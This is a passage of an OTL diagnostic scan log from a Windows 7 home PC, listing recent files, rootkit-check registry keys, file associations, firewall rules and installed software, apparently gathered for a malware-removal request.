[2014/09/30 17:07:06 | 000,001,354 | ---- | C] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\iSkysoft Video Converter Ultimate.lnk
[2014/09/30 17:06:57 | 000,721,263 | ---- | C] () -- C:\Windows\SysWow64\ISCM64.dll
[2014/09/30 17:06:57 | 000,214,528 | ---- | C] () -- C:\Windows\SysWow64\ISCM32.dll
[2014/09/29 19:47:17 | 000,076,441 | ---- | C] () -- C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
[2014/09/17 09:37:48 | 000,000,004 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
[2014/07/10 17:27:56 | 000,004,096 | -H-- | C] () -- C:\Users\Mitey Fresh\AppData\Local\keyfile3.drm
[2014/03/11 16:33:22 | 000,002,149 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Local\recently-used.xbel
[2014/02/03 08:33:54 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2013/12/19 09:49:37 | 000,000,027 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Roaming\WB.CFG
[2013/08/08 12:48:44 | 000,007,061 | ---- | C] () -- C:\Program Files\Common Files\ecisettings.props.preupdate
[2013/08/08 12:37:38 | 000,002,539 | ---- | C] () -- C:\Program Files\Common Files\ECI_Data.bat
[2013/08/08 12:37:38 | 000,000,329 | ---- | C] () -- C:\Program Files\Common Files\AppMgrIcon.gif
[2013/08/08 12:37:38 | 000,000,128 | ---- | C] () -- C:\Program Files\Common Files\StartClient.bat
[2013/05/28 17:24:28 | 000,013,824 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/05/09 12:25:17 | 000,061,304 | ---- | C] () -- C:\Users\Mitey Fresh\g2mdlhlpx.exe
[2013/04/05 11:10:11 | 000,764,746 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/03/28 13:45:05 | 000,000,376 | ---- | C] () -- C:\Windows\ODBC.INI
 
========== ZeroAccess Check ==========
 
[2009/07/14 15:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/25 13:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/25 12:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 12:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 23:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 12:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/10/10 11:45:41 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\AUSkey
[2013/07/28 21:46:44 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\AutoBinaryCode2
[2014/09/12 21:15:52 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\BatteryCare
[2014/04/08 21:58:58 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\BitComet
[2014/06/26 20:50:56 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\calibre
[2013/11/18 21:12:47 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Com.Comm100.LiveChat.AirVisitorMonitor.En
[2013/11/18 21:12:46 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Com.Comm100.LiveChat.AirVisitorMonitor.En.ED02F0ED4016DF29F52CC2E3BD1ED89CCC440D32.1
[2014/01/23 10:00:34 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\DAEMON Tools Lite
[2013/03/28 16:55:05 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Monotype Imaging
[2014/02/09 21:43:00 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\rmi
[2014/10/16 22:09:00 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Spotify
[2014/10/02 13:43:04 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
[2014/09/30 17:07:43 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 40 bytes -> C:\ProgramData\MTA San Andreas All:NT
@Alternate Data Stream - 40 bytes -> C:\ProgramData:NT
@Alternate Data Stream - 160 bytes -> C:\ProgramData\MTA San Andreas All:NT2
@Alternate Data Stream - 160 bytes -> C:\ProgramData:NT2
@Alternate Data Stream - 131 bytes -> C:\ProgramData\TEMP:373E1720
 
< End of report >

Extras.txt Log:

OTL Extras logfile created on: 22/10/2014 2:12:31 PM - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000c09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy
 
3.79 Gb Total Physical Memory | 2.40 Gb Available Physical Memory | 63.28% Memory free
7.59 Gb Paging File | 6.05 Gb Available in Paging File | 79.78% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 273.39 Gb Total Space | 115.52 Gb Free Space | 42.25% Space Free | Partition Type: NTFS
Drive D: | 180.27 Gb Total Space | 117.47 Gb Free Space | 65.16% Space Free | Partition Type: NTFS
 
Computer Name: KIRRA-PC | User Name: Mitey Fresh | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
.url [@ = InternetShortcut] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
 
[HKEY_USERS\.DEFAULT\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
[HKEY_USERS\S-1-5-18\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
[HKEY_USERS\S-1-5-21-2275511576-419542734-2349628481-1000\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1"
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0B8908D6-CCF7-40EE-99F2-9BAD28BF4B19}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{0BC55BBB-248D-4BF5-ADA6-6270B3B11686}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{0FFEC506-D187-46D2-BDF3-621541E0F983}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{1A19F61E-DB6E-404F-ACEF-4B615871A2CD}" = rport=445 | protocol=6 | dir=out | app=system | 
"{297DAB00-FEDC-47C9-B09E-97E1909889AA}" = rport=139 | protocol=6 | dir=out | app=system | 
"{3BB53184-4A31-4AFF-9977-DF3CE46A784F}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | [email protected],-28539 | 
"{741D65CC-BF52-42A5-9CE5-BEE4AEAF2D6A}" = rport=138 | protocol=17 | dir=out | app=system | 
"{7B2EAC73-751C-41B2-9666-9E94FA7E6D83}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe | 
"{81CF275F-C536-4575-BDA5-9CF942C08E5D}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{8C34F054-98EC-4FC0-BC7E-ACEF806C720E}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{90CB2CA8-BCEF-48A9-8405-9AEA3E0B54DE}" = lport=10243 | protocol=6 | dir=in | app=system | 
"{9D997B49-821A-444D-8920-A5CCCAF1D07E}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) | 
"{A480DC5D-D842-4403-8EC8-5E3D4ADCC93F}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{A4C18B0C-1FD8-4EBD-A36D-75D1C3702D8E}" = lport=138 | protocol=17 | dir=in | app=system | 
"{BED82397-C3BF-4FD5-87BC-19EBBF94AC77}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{C4FC1D7C-4D1D-4A94-8118-193B7B2FFEEC}" = rport=10243 | protocol=6 | dir=out | app=system | 
"{C9F3E318-3119-4F14-8BCA-A51E1E1478D7}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{CE2CC353-510E-49D1-AFE4-C58F31E73BAA}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{D148DB5B-5000-4D65-88EB-091B8EFC2487}" = lport=445 | protocol=6 | dir=in | app=system | 
"{D43370F8-B23B-4CFD-BC6E-D299F24AAAEB}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{E10E2CDB-4846-43DD-A763-D19C63DFB6A3}" = lport=137 | protocol=17 | dir=in | app=system | 
"{E593D741-4FAD-4710-BED6-74680DC7B837}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) | 
"{E70213CF-BEF7-4575-BBC0-5795BF980A26}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe | 
"{E7BACAB6-1DBE-4E0C-A478-A011A28342DD}" = lport=139 | protocol=6 | dir=in | app=system | 
"{F2023297-E0AC-4E52-B85D-4C2FB252C51A}" = rport=137 | protocol=17 | dir=out | app=system | 
"{F668716D-56C2-4D40-8D6D-F2462FA05D2D}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{FD1BD8F5-02BF-46FA-9678-555491850959}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0A19E1BC-DF06-495B-B95F-7EDD7B024D05}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{0A410111-BF3A-4C15-B7D0-49DBAFF003AE}" = protocol=1 | dir=out | [email protected],-28544 | 
"{0C24E7A1-7B4E-43D6-9911-C15CCF348321}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{0D9D9357-421E-48EB-BB82-6294722E93A7}" = protocol=58 | dir=out | [email protected],-503 | 
"{1678EE80-1670-4CDC-B7BC-B05348016B92}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{1FA77B58-C4FF-405E-8B33-B4FA4568DA6F}" = protocol=6 | dir=in | app=d:\games\lost via domus\gu.exe | 
"{21E140F2-CB43-4BD0-9395-F56BB4142527}" = protocol=17 | dir=in | app=d:\games\lost via domus\detection\launcher.exe | 
"{2CA298A3-9646-419F-BBD3-CC4DCA3C6441}" = protocol=6 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{31F0F88D-E918-433F-BA98-5813E1B9F3FA}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{41C07927-8945-41A1-872A-422AC062B132}" = protocol=17 | dir=in | app=d:\games\codename eagle\lobby.exe | 
"{428D384D-8C5C-4F0A-92D6-36475CDF3A3B}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{4EE75D8B-5621-4BDD-A9BC-D25ABDE0F109}" = protocol=6 | dir=in | app=d:\games\lost via domus\detection\launcher.exe | 
"{59CDDD20-7080-4C93-A5E9-73AE1AC9D506}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5C7C13EC-4811-4CB8-9BCC-1674E1FF48A7}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{5D125E11-9EA5-4DB7-8F29-E53F6E5907B2}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{5DA5520C-A7A2-4111-A001-B0FCD1D478B8}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{5E88C156-642A-43D9-B825-CA44DA50E2F0}" = protocol=17 | dir=in | app=d:\games\codename eagle\ce.exe | 
"{61DC7026-0984-45E7-BC91-91FE5E8087D0}" = protocol=17 | dir=in | app=c:\program files (x86)\bitcomet\bitcomet.exe | 
"{621C4A12-7597-4CAE-8161-E55B73EA5D2E}" = protocol=58 | dir=in | [email protected],-28545 | 
"{65210A00-F8A4-4550-BA2B-02954CD7A31B}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe | 
"{697B03EC-EB63-434B-BB54-55C984BCFD27}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe | 
"{7456601F-F4F5-43F6-BBE2-1295B2798031}" = protocol=58 | dir=in | app=system | 
"{74F47DA3-4957-48A6-B361-2937411D11B1}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe | 
"{76E5A99D-688A-4D84-A85B-3220CA7826A3}" = protocol=6 | dir=in | app=c:\program files (x86)\bitcomet\bitcomet.exe | 
"{8357DE09-67FB-4151-BA7F-16684BC13B49}" = protocol=6 | dir=in | app=d:\games\codename eagle\lobby.exe | 
"{84D9AA49-17DE-4C30-B42A-6AE85172B746}" = protocol=17 | dir=in | app=d:\games\lost via domus\yeti_final_win32.exe | 
"{854B0BB5-35C1-4CBD-ADBD-6A516457597A}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{89F0F018-9FF4-44BE-A4EB-DBAD9E683D1D}" = protocol=6 | dir=out | app=%systemroot%\system32\wudfhost.exe | 
"{8B790030-21A6-4046-80F5-75C3958F097D}" = protocol=6 | dir=in | app=d:\games\codename eagle\ce.exe | 
"{98560BE1-0010-4AE2-B1D6-6ED4BAD1AF37}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe | 
"{9E615BC3-0015-47DD-9F43-0E4D6AA0FE3E}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe | 
"{A10E4941-F106-4949-9DD9-E86F16C07E75}" = protocol=17 | dir=in | app=d:\games\lost via domus\gu.exe | 
"{A8DAAC52-343C-443F-AEBF-4F6B7217CDFA}" = protocol=6 | dir=in | app=d:\games\lost via domus\yeti_final_win32.exe | 
"{B256C1C1-AEB6-4F0A-AA96-E2D956EF9806}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{B4259307-6CE3-4B92-9466-7740BC54B7B8}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{BB122876-A5FB-461F-9A09-39132701B2CC}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe | 
"{BE9281E9-0C6C-4B51-95F6-9F87314A494D}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{C1C755CE-A661-471E-8A18-9BC29825A6E0}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe | 
"{C556B6DD-CE40-4275-BAB8-5C9995385049}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{C896A48A-2D38-4F11-82D7-3662183C29AE}" = protocol=6 | dir=in | app=d:\games\steam\steam.exe | 
"{CCCBF416-7A1D-4BEB-8D74-4AC9CDB4DE37}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{CEF8E341-4A55-4A2E-ABD5-1F0325A643B2}" = protocol=17 | dir=in | app=d:\games\steam\steam.exe | 
"{D97EFB98-E414-404F-A7F4-2DFB922AB696}" = protocol=58 | dir=out | [email protected],-28546 | 
"{E044FCA4-D58C-469D-BBED-6AC77E6118D8}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe | 
"{F05B6B69-8907-4F8D-AA1C-F0F658882E06}" = protocol=1 | dir=in | [email protected],-28543 | 
"{F2B437C1-251F-4D89-A754-C3A20CB3582C}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{FA5B1E97-F7D9-4D8C-AE14-CF6FC35E7D86}" = protocol=6 | dir=out | app=system | 
"{FE7025FF-2959-4C46-9593-3F8B9AD9F4AD}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe | 
"TCP Query User{0059D8A7-AF91-40EE-8043-1235CA9426B0}C:\users\mitey fresh\appdata\roaming\spotify\spotify.exe" = protocol=6 | dir=in | app=c:\users\mitey fresh\appdata\roaming\spotify\spotify.exe | 
"TCP Query User{1CBF42CC-8B9A-4582-B34F-21518CE169C6}C:\users\mitey fresh\appdata\roaming\spotify\spotify.exe" = protocol=6 | dir=in | app=c:\users\mitey fresh\appdata\roaming\spotify\spotify.exe | 
"TCP Query User{406FAF84-452C-49F7-BAC9-19DD8A1727BC}D:\games\codename eagle\iplist.exe" = protocol=6 | dir=in | app=d:\games\codename eagle\iplist.exe | 
"TCP Query User{7D94B055-3F99-4304-961F-BFC470B92521}C:\program files (x86)\torntv.com\torntv downloader.exe" = protocol=6 | dir=in | app=c:\program files (x86)\torntv.com\torntv downloader.exe | 
"TCP Query User{C085D7FB-A49B-4CDA-9628-804A618ECFBE}D:\games\codename eagle\lobby.exe" = protocol=6 | dir=in | app=d:\games\codename eagle\lobby.exe | 
"TCP Query User{C691299A-30B2-4403-AA11-B0A5953AE889}D:\games\gta san andreas\gta sa with cleo mod\proxy_sa.exe" = protocol=6 | dir=in | app=d:\games\gta san andreas\gta sa with cleo mod\proxy_sa.exe | 
"TCP Query User{DA14DA00-6F7D-4C44-B830-0C9C4076F3D5}D:\games\steam\steamapps\common\starbound\win32\starbound_server.exe" = protocol=6 | dir=in | app=d:\games\steam\steamapps\common\starbound\win32\starbound_server.exe | 
"TCP Query User{DA62D2E0-210E-462C-BFE6-4578546DEBEC}D:\games\codename eagle\ce.exe" = protocol=6 | dir=in | app=d:\games\codename eagle\ce.exe | 
"UDP Query User{0EB46071-1301-423C-A60B-A1BA9397331E}D:\games\steam\steamapps\common\starbound\win32\starbound_server.exe" = protocol=17 | dir=in | app=d:\games\steam\steamapps\common\starbound\win32\starbound_server.exe | 
"UDP Query User{249359C5-4B04-420F-B2A8-CC3F46FD02F4}D:\games\gta san andreas\gta sa with cleo mod\proxy_sa.exe" = protocol=17 | dir=in | app=d:\games\gta san andreas\gta sa with cleo mod\proxy_sa.exe | 
"UDP Query User{3DD764F9-C7AB-4B2F-B41F-01E700A045D4}D:\games\codename eagle\iplist.exe" = protocol=17 | dir=in | app=d:\games\codename eagle\iplist.exe | 
"UDP Query User{5AC26F4A-3D57-4F7C-92F8-39E22CE5E857}C:\users\mitey fresh\appdata\roaming\spotify\spotify.exe" = protocol=17 | dir=in | app=c:\users\mitey fresh\appdata\roaming\spotify\spotify.exe | 
"UDP Query User{633F24D5-BB9C-4C70-B201-C47B1E152309}D:\games\codename eagle\lobby.exe" = protocol=17 | dir=in | app=d:\games\codename eagle\lobby.exe | 
"UDP Query User{72F728F1-2F37-4747-B67B-7D19EE8E2D6B}C:\users\mitey fresh\appdata\roaming\spotify\spotify.exe" = protocol=17 | dir=in | app=c:\users\mitey fresh\appdata\roaming\spotify\spotify.exe | 
"UDP Query User{7EAEBC5E-DC35-48A7-8A50-B3140CEB1316}C:\program files (x86)\torntv.com\torntv downloader.exe" = protocol=17 | dir=in | app=c:\program files (x86)\torntv.com\torntv downloader.exe | 
"UDP Query User{E6D0FFF1-98A5-4452-B161-21E64DCA05B8}D:\games\codename eagle\ce.exe" = protocol=17 | dir=in | app=d:\games\codename eagle\ce.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{23F2C78C-E131-4CA0-8F84-3473FB7728BA}" = Microsoft Security Client
"{26A24AE4-039D-4CA4-87B4-2F86417017FF}" = Java 7 Update 17 (64-bit)
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6965A8D2-465D-4F98-9FAA-0E9E2348F329}" = Microsoft LifeCam
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9C5A08BF-BB99-4998-81BD-F6CC32483B34}" = Microsoft Corporation
"{C168639F-5810-4EC8-B1E8-0251AA8A771C}" = File Association Helper
